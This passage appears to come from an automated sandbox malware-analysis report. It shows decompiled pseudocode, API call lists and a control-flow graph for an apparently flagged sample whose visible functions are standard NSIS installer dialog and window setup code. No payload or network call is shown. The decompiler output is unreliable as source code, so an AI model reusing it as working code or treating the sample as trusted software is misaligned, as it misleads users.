                                                              						 *0x42a268 = _t127;
                                                              						 *0x423744 = GetDlgItem(_t127, 1);
                                                              						_t91 = GetDlgItem(_t127, 2);
                                                              						_push(0xffffffff);
                                                              						_push(0x1c);
                                                              						 *0x421710 = _t91;
                                                              						E004045C4(_t127);
                                                              						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
                                                              						 *0x42922c = E0040140B(4);
                                                              						_t34 = 1;
                                                              						__eflags = 1;
                                                              						 *0x423730 = 1;
                                                              					}
                                                              					_t124 =  *0x40a39c; // 0x0
                                                              					_t136 = 0;
                                                              					_t133 = (_t124 << 6) +  *0x42a280;
                                                              					__eflags = _t124;
                                                              					if(_t124 < 0) {
                                                              						L36:
                                                              						E00404610(0x40b);
                                                              						while(1) {
                                                              							_t36 =  *0x423730;
                                                              							 *0x40a39c =  *0x40a39c + _t36;
                                                              							_t133 = _t133 + (_t36 << 6);
                                                              							_t38 =  *0x40a39c; // 0x0
                                                              							__eflags = _t38 -  *0x42a284;
                                                              							if(_t38 ==  *0x42a284) {
                                                              								E0040140B(1);
                                                              							}
                                                              							__eflags =  *0x42922c - _t136;
                                                              							if( *0x42922c != _t136) {
                                                              								break;
                                                              							}
                                                              							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                              							if(__eflags >= 0) {
                                                              								break;
                                                              							}
                                                              							_t117 =  *(_t133 + 0x14);
                                                              							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                              							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                              							_push(0xfffffc19);
                                                              							E004045C4(_t127);
                                                              							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                              							_push(0xfffffc1b);
                                                              							E004045C4(_t127);
                                                              							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                              							_push(0xfffffc1a);
                                                              							E004045C4(_t127);
                                                              							_t48 = GetDlgItem(_t127, 3);
                                                              							__eflags =  *0x42a2ec - _t136;
                                                              							_v28 = _t48;
                                                              							if( *0x42a2ec != _t136) {
                                                              								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                              								__eflags = _t117;
                                                              							}
                                                              							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                              							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                              							E004045E6(_t117 & 0x00000002);
                                                              							_t118 = _t117 & 0x00000004;
                                                              							EnableWindow( *0x421710, _t118);
                                                              							__eflags = _t118 - _t136;
                                                              							if(_t118 == _t136) {
                                                              								_push(1);
                                                              							} else {
                                                              								_push(_t136);
                                                              							}
                                                              							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                              							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                              							__eflags =  *0x42a2ec - _t136;
                                                              							if( *0x42a2ec == _t136) {
                                                              								_push( *0x423744);
                                                              							} else {
                                                              								SendMessageW(_t127, 0x401, 2, _t136);
                                                              								_push( *0x421710);
                                                              							}
                                                              							E004045F9();
                                                              							E00406668(0x423748, E004040A6());
                                                              							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                              							SetWindowTextW(_t127, 0x423748); // executed
                                                              							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                              							__eflags = _t67;
                                                              							if(_t67 != 0) {
                                                              								continue;
                                                              							} else {
                                                              								__eflags =  *_t133 - _t136;
                                                              								if( *_t133 == _t136) {
                                                              									continue;
                                                              								}
                                                              								__eflags =  *(_t133 + 4) - 5;
                                                              								if( *(_t133 + 4) != 5) {
                                                              									DestroyWindow( *0x429238); // executed
                                                              									 *0x422720 = _t133;
                                                              									__eflags =  *_t133 - _t136;
                                                              									if( *_t133 <= _t136) {
                                                              										goto L60;
                                                              									}
                                                              									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                              									__eflags = _t73 - _t136;
                                                              									 *0x429238 = _t73;
                                                              									if(_t73 == _t136) {
                                                              										goto L60;
                                                              									}
                                                              									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                              									_push(6);
                                                              									E004045C4(_t73);
                                                              									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                              									ScreenToClient(_t127, _t137 + 0x10);
                                                              									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                              									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                              									__eflags =  *0x42922c - _t136;
                                                              									if( *0x42922c != _t136) {
                                                              										goto L63;
                                                              									}
                                                              									ShowWindow( *0x429238, 8); // executed
                                                              									E00404610(0x405);
                                                              									goto L60;
                                                              								}
                                                              								__eflags =  *0x42a2ec - _t136;
                                                              								if( *0x42a2ec != _t136) {
                                                              									goto L63;
                                                              								}
                                                              								__eflags =  *0x42a2e0 - _t136;
                                                              								if( *0x42a2e0 != _t136) {
                                                              									continue;
                                                              								}
                                                              								goto L63;
                                                              							}
                                                              						}
                                                              						DestroyWindow( *0x429238);
                                                              						 *0x42a268 = _t136;
                                                              						EndDialog(_t127,  *0x421f18);
                                                              						goto L60;
                                                              					} else {
                                                              						__eflags = _t34 - 1;
                                                              						if(_t34 != 1) {
                                                              							L35:
                                                              							__eflags =  *_t133 - _t136;
                                                              							if( *_t133 == _t136) {
                                                              								goto L63;
                                                              							}
                                                              							goto L36;
                                                              						}
                                                              						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                              						__eflags = _t86;
                                                              						if(_t86 == 0) {
                                                              							goto L35;
                                                              						}
                                                              						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                              						__eflags =  *0x42922c;
                                                              						return 0 |  *0x42922c == 0x00000000;
                                                              					}
                                                              				} else {
                                                              					_t127 = _a4;
                                                              					_t136 = 0;
                                                              					if(_t130 == 0x47) {
                                                              						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                              					}
                                                              					_t122 = _a12;
                                                              					if(_t130 != 5) {
                                                              						L8:
                                                              						if(_t130 != 0x40d) {
                                                              							__eflags = _t130 - 0x11;
                                                              							if(_t130 != 0x11) {
                                                              								__eflags = _t130 - 0x111;
                                                              								if(_t130 != 0x111) {
                                                              									goto L28;
                                                              								}
                                                              								_t135 = _t122 & 0x0000ffff;
                                                              								_t128 = GetDlgItem(_t127, _t135);
                                                              								__eflags = _t128 - _t136;
                                                              								if(_t128 == _t136) {
                                                              									L15:
                                                              									__eflags = _t135 - 1;
                                                              									if(_t135 != 1) {
                                                              										__eflags = _t135 - 3;
                                                              										if(_t135 != 3) {
                                                              											_t129 = 2;
                                                              											__eflags = _t135 - _t129;
                                                              											if(_t135 != _t129) {
                                                              												L27:
                                                              												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                              												goto L28;
                                                              											}
                                                              											__eflags =  *0x42a2ec - _t136;
                                                              											if( *0x42a2ec == _t136) {
                                                              												_t99 = E0040140B(3);
                                                              												__eflags = _t99;
                                                              												if(_t99 != 0) {
                                                              													goto L28;
                                                              												}
                                                              												 *0x421f18 = 1;
                                                              												L23:
                                                              												_push(0x78);
                                                              												L24:
                                                              												E0040459D();
                                                              												goto L28;
                                                              											}
                                                              											E0040140B(_t129);
                                                              											 *0x421f18 = _t129;
                                                              											goto L23;
                                                              										}
                                                              										__eflags =  *0x40a39c - _t136; // 0x0
                                                              										if(__eflags <= 0) {
                                                              											goto L27;
                                                              										}
                                                              										_push(0xffffffff);
                                                              										goto L24;
                                                              									}
                                                              									_push(_t135);
                                                              									goto L24;
                                                              								}
                                                              								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                              								_t103 = IsWindowEnabled(_t128);
                                                              								__eflags = _t103;
                                                              								if(_t103 == 0) {
                                                              									L63:
                                                              									return 0;
                                                              								}
                                                              								goto L15;
                                                              							}
                                                              							SetWindowLongW(_t127, _t136, _t136);
                                                              							return 1;
                                                              						}
                                                              						DestroyWindow( *0x429238);
                                                              						 *0x429238 = _t122;
                                                              						L60:
                                                              						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                                              							ShowWindow(_t127, 0xa); // executed
                                                              							 *0x425748 = 1;
                                                              						}
                                                              						goto L63;
                                                              					} else {
                                                              						asm("sbb eax, eax");
                                                              						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                              						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                              							L28:
                                                              							return E0040462B(_a8, _t122, _a16);
                                                              						} else {
                                                              							ShowWindow(_t127, 4);
                                                              							goto L8;
                                                              						}
                                                              					}
                                                              				}
                                                              			}































                                                              0x004040d0
                                                              0x004040d7
                                                              0x0040423e
                                                              0x00404242
                                                              0x00404246
                                                              0x00404248
                                                              0x0040424d
                                                              0x00404258
                                                              0x00404263
                                                              0x00404268
                                                              0x0040426a
                                                              0x0040426c
                                                              0x0040426f
                                                              0x00404274
                                                              0x00404282
                                                              0x0040428f
                                                              0x00404296
                                                              0x00404296
                                                              0x00404297
                                                              0x00404297
                                                              0x0040429c
                                                              0x004042a2
                                                              0x004042a9
                                                              0x004042af
                                                              0x004042b1
                                                              0x004042f1
                                                              0x004042f6
                                                              0x004042fb
                                                              0x004042fb
                                                              0x00404300
                                                              0x00404309
                                                              0x0040430b
                                                              0x00404310
                                                              0x00404316
                                                              0x0040431a
                                                              0x0040431a
                                                              0x0040431f
                                                              0x00404325
                                                              0x00000000
                                                              0x00000000
                                                              0x00404330
                                                              0x00404336
                                                              0x00000000
                                                              0x00000000
                                                              0x0040433f
                                                              0x00404347
                                                              0x0040434c
                                                              0x0040434f
                                                              0x00404355
                                                              0x0040435a
                                                              0x0040435d
                                                              0x00404363
                                                              0x00404368
                                                              0x0040436b
                                                              0x00404371
                                                              0x00404379
                                                              0x0040437f
                                                              0x00404385
                                                              0x00404389
                                                              0x00404390
                                                              0x00404390
                                                              0x00404390
                                                              0x0040439a
                                                              0x004043ac
                                                              0x004043b8
                                                              0x004043bd
                                                              0x004043c7
                                                              0x004043cd
                                                              0x004043cf
                                                              0x004043d4
                                                              0x004043d1
                                                              0x004043d1
                                                              0x004043d1
                                                              0x004043e4
                                                              0x004043fc
                                                              0x004043fe
                                                              0x00404404
                                                              0x00404419
                                                              0x00404406
                                                              0x0040440f
                                                              0x00404411
                                                              0x00404411
                                                              0x0040441f
                                                              0x00404430
                                                              0x00404446
                                                              0x0040444d
                                                              0x00404457
                                                              0x0040445c
                                                              0x0040445e
                                                              0x00000000
                                                              0x00404464
                                                              0x00404464
                                                              0x00404466
                                                              0x00000000
                                                              0x00000000
                                                              0x0040446c
                                                              0x00404470
                                                              0x00404495
                                                              0x0040449b
                                                              0x004044a1
                                                              0x004044a3
                                                              0x00000000
                                                              0x00000000
                                                              0x004044c9
                                                              0x004044cf
                                                              0x004044d1
                                                              0x004044d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004044dc
                                                              0x004044df
                                                              0x004044e2
                                                              0x004044f9
                                                              0x00404505
                                                              0x0040451e
                                                              0x00404528
                                                              0x0040452d
                                                              0x00404533
                                                              0x00000000
                                                              0x00000000
                                                              0x0040453d
                                                              0x00404548
                                                              0x00000000
                                                              0x00404548
                                                              0x00404472
                                                              0x00404478
                                                              0x00000000
                                                              0x00000000
                                                              0x0040447e
                                                              0x00404484
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040448a
                                                              0x0040445e
                                                              0x00404555
                                                              0x00404561
                                                              0x00404568
                                                              0x00000000
                                                              0x004042b3
                                                              0x004042b3
                                                              0x004042b6
                                                              0x004042e9
                                                              0x004042e9
                                                              0x004042eb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004042eb
                                                              0x004042bc
                                                              0x004042c1
                                                              0x004042c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004042d3
                                                              0x004042db
                                                              0x00000000
                                                              0x004042e1
                                                              0x004040e9
                                                              0x004040e9
                                                              0x004040ed
                                                              0x004040f2
                                                              0x00404101
                                                              0x00404101
                                                              0x00404107
                                                              0x0040410e
                                                              0x00404152
                                                              0x00404158
                                                              0x00404171
                                                              0x00404174
                                                              0x00404187
                                                              0x0040418d
                                                              0x00000000
                                                              0x00000000
                                                              0x00404193
                                                              0x0040419e
                                                              0x004041a0
                                                              0x004041a2
                                                              0x004041c1
                                                              0x004041c1
                                                              0x004041c4
                                                              0x004041c9
                                                              0x004041cc
                                                              0x004041dc
                                                              0x004041dd
                                                              0x004041df
                                                              0x00404215
                                                              0x00404225
                                                              0x00000000
                                                              0x00404225
                                                              0x004041e1
                                                              0x004041e7
                                                              0x00404200
                                                              0x00404205
                                                              0x00404207
                                                              0x00000000
                                                              0x00000000
                                                              0x00404209
                                                              0x004041f5
                                                              0x004041f5
                                                              0x004041f7
                                                              0x004041f7
                                                              0x00000000
                                                              0x004041f7
                                                              0x004041ea
                                                              0x004041ef
                                                              0x00000000
                                                              0x004041ef
                                                              0x004041ce
                                                              0x004041d4
                                                              0x00000000
                                                              0x00000000
                                                              0x004041d6
                                                              0x00000000
                                                              0x004041d6
                                                              0x004041c6
                                                              0x00000000
                                                              0x004041c6
                                                              0x004041ac
                                                              0x004041b3
                                                              0x004041b9
                                                              0x004041bb
                                                              0x00404591
                                                              0x00000000
                                                              0x00404591
                                                              0x00000000
                                                              0x004041bb
                                                              0x00404179
                                                              0x00000000
                                                              0x00404181
                                                              0x00404160
                                                              0x00404166
                                                              0x0040456e
                                                              0x00404574
                                                              0x00404581
                                                              0x00404587
                                                              0x00404587
                                                              0x00000000
                                                              0x00404110
                                                              0x00404115
                                                              0x00404121
                                                              0x0040412a
                                                              0x0040422b
                                                              0x00000000
                                                              0x00404149
                                                              0x0040414c
                                                              0x00000000
                                                              0x0040414c
                                                              0x0040412a
                                                              0x0040410e

                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                              • ShowWindow.USER32(?), ref: 00404121
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                              • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                              • DestroyWindow.USER32 ref: 00404160
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                              • GetDlgItem.USER32(?,?), ref: 00404198
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                              • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                              • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                              • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                              • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                              • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                              • EnableWindow.USER32(?,?), ref: 004043C7
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                              • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                              • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: H7B
                                                              • API String ID: 121052019-2300413410
                                                              • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                              • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                              • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                              • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 313 403d9d-403dc6 call 403fed call 40603f 304->313 309 403d92-403d98 lstrcatW 305->309 310 403d7c-403d8d call 406536 305->310 309->313 310->309 319 403e58-403e60 call 40603f 313->319 320 403dcc-403dd1 313->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 321 403dd7-403dff call 406536 320->321 321->319 331 403e01-403e05 321->331 326->327 329 403f14-403f1c call 40140b 327->329 330 403e95-403ec5 RegisterClassW 327->330 344 403f26-403f31 call 403fed 329->344 345 403f1e-403f21 329->345 332 403fe3 330->332 333 403ecb-403f0f SystemParametersInfoW CreateWindowExW 330->333 335 403e17-403e23 lstrlenW 331->335 336 403e07-403e14 call 405f64 331->336 338 403fe5-403fec 332->338 333->329 339 403e25-403e33 lstrcmpiW 335->339 340 403e4b-403e53 call 405f37 call 406668 335->340 336->335 339->340 343 403e35-403e3f GetFileAttributesW 339->343 340->319 347 403e41-403e43 343->347 348 403e45-403e46 call 405f83 343->348 354 403f37-403f51 ShowWindow call 4069c5 344->354 355 403fba-403fbb call 40579d 344->355 345->338 347->340 347->348 348->340 362 403f53-403f58 call 4069c5 354->362 363 403f5d-403f6f GetClassInfoW 354->363 358 403fc0-403fc2 355->358 360 403fc4-403fca 358->360 361 403fdc-403fde call 40140b 358->361 360->345 366 403fd0-403fd7 call 40140b 360->366 361->332 362->363 364 403f71-403f81 GetClassInfoW RegisterClassW 363->364 365 403f87-403faa DialogBoxParamW call 40140b 363->365 364->365 371 403faf-403fb8 call 403c67 365->371 366->345 371->338
                                                              C-Code - Quality: 96%
                                                              			E00403D17(void* __eflags) {
                                                              				intOrPtr _v4;
                                                              				intOrPtr _v8;
                                                              				int _v12;
                                                              				void _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t22;
                                                              				void* _t30;
                                                              				void* _t32;
                                                              				int _t33;
                                                              				void* _t36;
                                                              				int _t39;
                                                              				int _t40;
                                                              				int _t44;
                                                              				short _t63;
                                                              				WCHAR* _t65;
                                                              				signed char _t69;
                                                              				WCHAR* _t76;
                                                              				intOrPtr _t82;
                                                              				WCHAR* _t87;
                                                              
                                                              				_t82 =  *0x42a270;
                                                              				_t22 = E00406A35(2);
                                                              				_t90 = _t22;
                                                              				if(_t22 == 0) {
                                                              					_t76 = 0x423748;
                                                              					L"1033" = 0x30;
                                                              					 *0x437002 = 0x78;
                                                              					 *0x437004 = 0;
                                                              					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                              					__eflags =  *0x423748;
                                                              					if(__eflags == 0) {
                                                              						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                              					}
                                                              					lstrcatW(L"1033", _t76);
                                                              				} else {
                                                              					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                              				}
                                                              				E00403FED(_t78, _t90);
                                                              				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
                                                              				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                              				 *0x42a2fc = 0x10000;
                                                              				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
                                                              					L16:
                                                              					if(E0040603F(_t98, _t86) == 0) {
                                                              						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                              					}
                                                              					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                              					 *0x429248 = _t30;
                                                              					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                              						L21:
                                                              						if(E0040140B(0) == 0) {
                                                              							_t32 = E00403FED(_t78, __eflags);
                                                              							__eflags =  *0x42a300;
                                                              							if( *0x42a300 != 0) {
                                                              								_t33 = E0040579D(_t32, 0);
                                                              								__eflags = _t33;
                                                              								if(_t33 == 0) {
                                                              									E0040140B(1);
                                                              									goto L33;
                                                              								}
                                                              								__eflags =  *0x42922c;
                                                              								if( *0x42922c == 0) {
                                                              									E0040140B(2);
                                                              								}
                                                              								goto L22;
                                                              							}
                                                              							ShowWindow( *0x423728, 5); // executed
                                                              							_t39 = E004069C5("RichEd20"); // executed
                                                              							__eflags = _t39;
                                                              							if(_t39 == 0) {
                                                              								E004069C5("RichEd32");
                                                              							}
                                                              							_t87 = L"RichEdit20W";
                                                              							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                              							__eflags = _t40;
                                                              							if(_t40 == 0) {
                                                              								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                              								 *0x429224 = _t87;
                                                              								RegisterClassW(0x429200);
                                                              							}
                                                              							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                              							E00403C67(E0040140B(5), 1);
                                                              							return _t44;
                                                              						}
                                                              						L22:
                                                              						_t36 = 2;
                                                              						return _t36;
                                                              					} else {
                                                              						_t78 =  *0x42a260;
                                                              						 *0x429204 = E00401000;
                                                              						 *0x429210 =  *0x42a260;
                                                              						 *0x429214 = _t30;
                                                              						 *0x429224 = 0x40a3b4;
                                                              						if(RegisterClassW(0x429200) == 0) {
                                                              							L33:
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						}
                                                              						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                              						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                              						goto L21;
                                                              					}
                                                              				} else {
                                                              					_t78 =  *(_t82 + 0x48);
                                                              					_t92 = _t78;
                                                              					if(_t78 == 0) {
                                                              						goto L16;
                                                              					}
                                                              					_t76 = 0x428200;
                                                              					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                              					_t63 =  *0x428200; // 0x43
                                                              					if(_t63 == 0) {
                                                              						goto L16;
                                                              					}
                                                              					if(_t63 == 0x22) {
                                                              						_t76 = 0x428202;
                                                              						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                              					}
                                                              					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                              					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                              						L15:
                                                              						E00406668(_t86, E00405F37(_t76));
                                                              						goto L16;
                                                              					} else {
                                                              						_t69 = GetFileAttributesW(_t76);
                                                              						if(_t69 == 0xffffffff) {
                                                              							L14:
                                                              							E00405F83(_t76);
                                                              							goto L15;
                                                              						}
                                                              						_t98 = _t69 & 0x00000010;
                                                              						if((_t69 & 0x00000010) != 0) {
                                                              							goto L15;
                                                              						}
                                                              						goto L14;
                                                              					}
                                                              				}
                                                              			}
























                                                              0x00403d1d
                                                              0x00403d26
                                                              0x00403d2d
                                                              0x00403d2f
                                                              0x00403d43
                                                              0x00403d55
                                                              0x00403d5e
                                                              0x00403d67
                                                              0x00403d6e
                                                              0x00403d73
                                                              0x00403d7a
                                                              0x00403d8d
                                                              0x00403d8d
                                                              0x00403d98
                                                              0x00403d31
                                                              0x00403d3c
                                                              0x00403d3c
                                                              0x00403d9d
                                                              0x00403da7
                                                              0x00403db0
                                                              0x00403db5
                                                              0x00403dc6
                                                              0x00403e58
                                                              0x00403e60
                                                              0x00403e69
                                                              0x00403e69
                                                              0x00403e7f
                                                              0x00403e85
                                                              0x00403e93
                                                              0x00403f14
                                                              0x00403f1c
                                                              0x00403f26
                                                              0x00403f2b
                                                              0x00403f31
                                                              0x00403fbb
                                                              0x00403fc0
                                                              0x00403fc2
                                                              0x00403fde
                                                              0x00000000
                                                              0x00403fde
                                                              0x00403fc4
                                                              0x00403fca
                                                              0x00403fd2
                                                              0x00403fd2
                                                              0x00000000
                                                              0x00403fca
                                                              0x00403f3f
                                                              0x00403f4a
                                                              0x00403f4f
                                                              0x00403f51
                                                              0x00403f58
                                                              0x00403f58
                                                              0x00403f63
                                                              0x00403f6b
                                                              0x00403f6d
                                                              0x00403f6f
                                                              0x00403f78
                                                              0x00403f7b
                                                              0x00403f81
                                                              0x00403f81
                                                              0x00403fa0
                                                              0x00403fb1
                                                              0x00000000
                                                              0x00403fb6
                                                              0x00403f1e
                                                              0x00403f20
                                                              0x00000000
                                                              0x00403e95
                                                              0x00403e95
                                                              0x00403ea1
                                                              0x00403eab
                                                              0x00403eb1
                                                              0x00403eb6
                                                              0x00403ec5
                                                              0x00403fe3
                                                              0x00403fe3
                                                              0x00000000
                                                              0x00403fe3
                                                              0x00403ed4
                                                              0x00403f0f
                                                              0x00000000
                                                              0x00403f0f
                                                              0x00403dcc
                                                              0x00403dcc
                                                              0x00403dcf
                                                              0x00403dd1
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ddf
                                                              0x00403df1
                                                              0x00403df6
                                                              0x00403dff
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e05
                                                              0x00403e07
                                                              0x00403e14
                                                              0x00403e14
                                                              0x00403e1d
                                                              0x00403e23
                                                              0x00403e4b
                                                              0x00403e53
                                                              0x00000000
                                                              0x00403e35
                                                              0x00403e36
                                                              0x00403e3f
                                                              0x00403e45
                                                              0x00403e46
                                                              0x00000000
                                                              0x00403e46
                                                              0x00403e41
                                                              0x00403e43
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e43
                                                              0x00403e23

                                                              APIs
                                                                • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                              • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76083420), ref: 00403E18
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                              • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F
                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                              • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                              • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                              • RegisterClassW.USER32(00429200), ref: 00403F81
                                                              • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
